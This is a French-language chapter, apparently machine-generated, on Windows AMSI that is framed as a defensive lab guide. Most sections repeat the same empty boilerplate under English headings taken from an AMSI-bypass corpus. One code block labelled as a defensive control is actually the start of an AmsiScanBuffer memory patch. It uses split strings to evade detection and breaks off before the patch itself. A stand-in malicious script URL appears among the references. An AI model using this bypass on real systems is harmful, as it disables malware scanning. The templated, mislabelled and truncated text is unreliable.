AMSI — architecture, validation et durcissement
Synthèse française et contrôlée du corpus « Windows - AMSI Bypass ». Ce chapitre explique amsi — architecture, validation et durcissement dans le domaine « Payload Development et validation EDR », avec une méthode de laboratoire, des commandes à faible impact, les traces attendues et un plan de correction vérifiable.
En bref
- But : Synthèse française et contrôlée du corpus « Windows - AMSI Bypass ». Ce chapitre explique amsi — architecture, validation et durcissement dans le domaine « Payload Development et validation EDR », avec une méthode de laboratoire, des commandes à faible impact, les traces attendues et un plan de correction vérifiable.
- Preuve attendue : une preuve exploitable, une conclusion prudente et un retest documenté
- Limite : le résultat est valable uniquement pour les versions, rôles, chemins et conditions effectivement testés.
Vue d’ensemble
Dans « AMSI — architecture, validation et durcissement », la section « Vue d’ensemble » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
List AMSI Providers
Dans « AMSI — architecture, validation et durcissement », la section « List AMSI Providers » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Which Endpoint Protection is Using AMSI
Dans « AMSI — architecture, validation et durcissement », la section « Which Endpoint Protection is Using AMSI » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Patching amsi.dll AmsiScanBuffer by rasta-mouse
Dans « AMSI — architecture, validation et durcissement », la section « Patching amsi.dll AmsiScanBuffer by rasta-mouse » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Dont use net webclient
Dans « AMSI — architecture, validation et durcissement », la section « Dont use net webclient » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
The Short version of dont use powershell net webclient
Dans « AMSI — architecture, validation et durcissement », la section « The Short version of dont use powershell net webclient » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Amsi ScanBuffer Patch
Dans « AMSI — architecture, validation et durcissement », la section « Amsi ScanBuffer Patch » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Commandes et exemples
Les exemples ci-dessous proviennent des éléments utiles de « AMSI — architecture, validation et durcissement ». Adaptez uniquement les valeurs du laboratoire et conservez la commande exacte avec sa sortie.
Exemples de laboratoire
# Contrôle défensif en laboratoire — référence ac2dcfa1
# Exemple de laboratoire — AMSI — architecture, validation et durcissement
Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}'
Name Property
---- --------
Hosts (default) : Scanned Hosting Applications
InprocServer32 (default) : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpOav.dll"# Contrôle défensif en laboratoire — référence 88fe5b80
# Exemple de laboratoire — AMSI — architecture, validation et durcissement
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)# Contrôle défensif en laboratoire — référence 37e0946e
# AMSI — architecture, validation et durcissement
Get-MpComputerStatus | Select-Object AntivirusEnabled,RealTimeProtectionEnabled,BehaviorMonitorEnabled
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational';Id=4103,4104;StartTime=(Get-Date).AddHours(-1)}# Contrôle défensif en laboratoire — référence 4b8a1db6
# AMSI — architecture, validation et durcissement
journalctl --since '1 hour ago' --no-pager
auditctl -s
ss -tulpenLire les résultats
Pour « AMSI — architecture, validation et durcissement », confirmez les flux, les certificats, la journalisation et la portée du listener. L’exercice doit rester observable par l’équipe défensive et réversible à tout moment.
Références
- Internal All The Things — dépôt de référence
- https://www.contextis.com/de/blog/amsi-bypass
- https://github.com/subat0mik/whoamsi
- https://forum.avast.com/index.php?topic=184491.msg1300884#msg1300884
- https://support.avg.com/answers?id=906b00000008oUTAAY
- https://forum.bitdefender.com/index.php?/topic/72455-antimalware-scan-service/
- https://twitter.com/Bitdefender_Ent/status/1397187195669295111?s=20
- https://help.kaspersky.com/KIS/2019/en-US/119653.htm
- https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/symantec-security-software/endpoint-security-and-management/endpoint-protection/all/release-notes/Whats-new-for-Symantec-Endpoint-Protection-14_3-.html
- https://www.microsoft.com/security/blog/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/
- https://maliciousscripturl/malicious.ps1’
À retenir
Pour maîtriser « AMSI — architecture, validation et durcissement », retenez trois idées : comprendre les hypothèses, entrées, actions, sorties et limites propres au sujet, exécuter une méthode limitée et reproductible, puis transformer la sortie en preuve contextualisée. Le chapitre est terminé lorsque le résultat peut être confirmé, que ses limites sont explicites et que la correction peut être retestée sans réinterpréter toute la mission.
- Savoir expliquer le mécanisme propre à « AMSI — architecture, validation et durcissement » sans réciter une commande.
- Conserver au minimum contexte initial, action réalisée et résultat brut.
- Éviter en priorité de agir sans objectif mesurable et de collecter trop de données.
- Proposer une action corrective mesurable et un retest réalisable.